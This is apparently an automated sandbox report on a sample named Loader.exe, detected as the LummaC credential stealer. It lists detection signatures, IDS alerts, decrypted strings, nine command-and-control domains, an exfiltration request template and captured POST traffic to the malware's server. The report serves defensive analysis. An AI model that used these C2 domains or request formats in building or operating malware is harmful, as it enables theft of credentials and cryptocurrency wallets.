Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1580145
MD5:245d1f68f4e8caffb294d206958761e5
SHA1:d80d3805309b53632aabb56a1a3284c1e8ba6c26
SHA256:397c3c9ce2aff57799b4620f05103733cc2489f91df6da545b5c1e5ac4350ebb
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 380 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 245D1F68F4E8CAFFB294D206958761E5)
    • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 504 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 245D1F68F4E8CAFFB294D206958761E5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["talkynicer.lat", "tentabatte.lat", "shapestickyr.lat", "curverpluch.lat", "wordyfindy.lat", "slipperyloo.lat", "bashfulacid.lat", "volcanohushe.click", "manyrestro.lat"], "Build id": "pqZnKP--Z2xsZXhl"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: Loader.exe PID: 504JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 4 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:04.845791+010020283713Unknown Traffic192.168.2.649708172.67.145.201443TCP
                2024-12-24T02:17:07.080105+010020283713Unknown Traffic192.168.2.649709172.67.145.201443TCP
                2024-12-24T02:17:09.470936+010020283713Unknown Traffic192.168.2.649710172.67.145.201443TCP
                2024-12-24T02:17:12.305800+010020283713Unknown Traffic192.168.2.649712172.67.145.201443TCP
                2024-12-24T02:17:15.429568+010020283713Unknown Traffic192.168.2.649723172.67.145.201443TCP
                2024-12-24T02:17:18.748829+010020283713Unknown Traffic192.168.2.649730172.67.145.201443TCP
                2024-12-24T02:17:21.891648+010020283713Unknown Traffic192.168.2.649743172.67.145.201443TCP
                2024-12-24T02:17:26.564441+010020283713Unknown Traffic192.168.2.649754172.67.145.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:05.854185+010020546531A Network Trojan was detected192.168.2.649708172.67.145.201443TCP
                2024-12-24T02:17:07.871102+010020546531A Network Trojan was detected192.168.2.649709172.67.145.201443TCP
                2024-12-24T02:17:27.334990+010020546531A Network Trojan was detected192.168.2.649754172.67.145.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:05.854185+010020498361A Network Trojan was detected192.168.2.649708172.67.145.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:07.871102+010020498121A Network Trojan was detected192.168.2.649709172.67.145.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:19.521214+010020480941Malware Command and Control Activity Detected192.168.2.649730172.67.145.201443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["talkynicer.lat", "tentabatte.lat", "shapestickyr.lat", "curverpluch.lat", "wordyfindy.lat", "slipperyloo.lat", "bashfulacid.lat", "volcanohushe.click", "manyrestro.lat"], "Build id": "pqZnKP--Z2xsZXhl"}
                Source: Loader.exeReversingLabs: Detection: 36%
                Source: Loader.exeVirustotal: Detection: 31%Perma Link
                Source: Loader.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: volcanohushe.click
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pqZnKP--Z2xsZXhl
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417745 CryptUnprotectData,3_2_00417745
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49754 version: TLS 1.2
                Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00ED0CF8 FindFirstFileExW,0_2_00ED0CF8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00ED0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00ED0DA9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00ED0CF8 FindFirstFileExW,3_2_00ED0CF8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00ED0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00ED0DA9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h3_2_0042D0CD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax]3_2_0040D11B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, eax3_2_0040D11B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00409400
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-65h]3_2_0043D4E1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000278h]3_2_00417745
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_00440770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4557D5DCh]3_2_004387D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00429070
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then xor ebx, ebx3_2_00429070
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax3_2_004058D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax3_2_004058D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h3_2_004158FC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00416896
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]3_2_0042C89E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B8BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B963
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx+04h]3_2_0040D907
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]3_2_00440180
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h3_2_0041598C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+06h]3_2_0041B9A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5C093193h]3_2_0041B25A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, ebx3_2_00417A75
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_00417207
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B215
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0043F286
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+18h]3_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [edx], cx3_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-2DCF3881h]3_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00417AB8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esp], ecx3_2_0042BB60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esp], ecx3_2_0042BB66
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00402B70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-00000098h]3_2_00421B00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+02h]3_2_00421B00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0043DB10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0043D325
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_004163C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4EB33D1Fh]3_2_004163C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+28h]3_2_004163C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then test eax, eax3_2_004393D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push eax3_2_004393D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_004073F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_004073F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041A3A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h3_2_0040B3BB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx-2Ch]3_2_0043E450
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]3_2_00440450
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_00426430
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+28h]3_2_0040E49F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [0044A454h]3_2_0040C4AE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042856C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, dword ptr [00446180h]3_2_00415506
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh3_2_00415506
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00418DC5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041D5B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]3_2_0041864E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00428630
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp cl, 0000002Eh3_2_00426639
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_00426639
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]3_2_0042963E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+28h]3_2_00417EEE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00417EEE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00429E80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-098D4F7Eh]3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0043CEA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00409EB9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00418F52
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00435F00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]3_2_0042963E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx]3_2_0040AF23
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [ecx]3_2_0043F730
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_004167E1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax3_2_00424F80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp-1EB1B624h]3_2_004257AC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49708 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49708 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49709 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49730 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49754 -> 172.67.145.201:443
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: volcanohushe.click
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49723 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 172.67.145.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49754 -> 172.67.145.201:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SG98CQFNYPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12814Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=THM6ZXIUPF3JTHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15084Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RFJR6IVX9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19912Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0E53ER9TEJJPPHBTIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EMRBGJPTQMJ4B8SPMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 575935Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: volcanohushe.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: volcanohushe.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanohushe.click
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
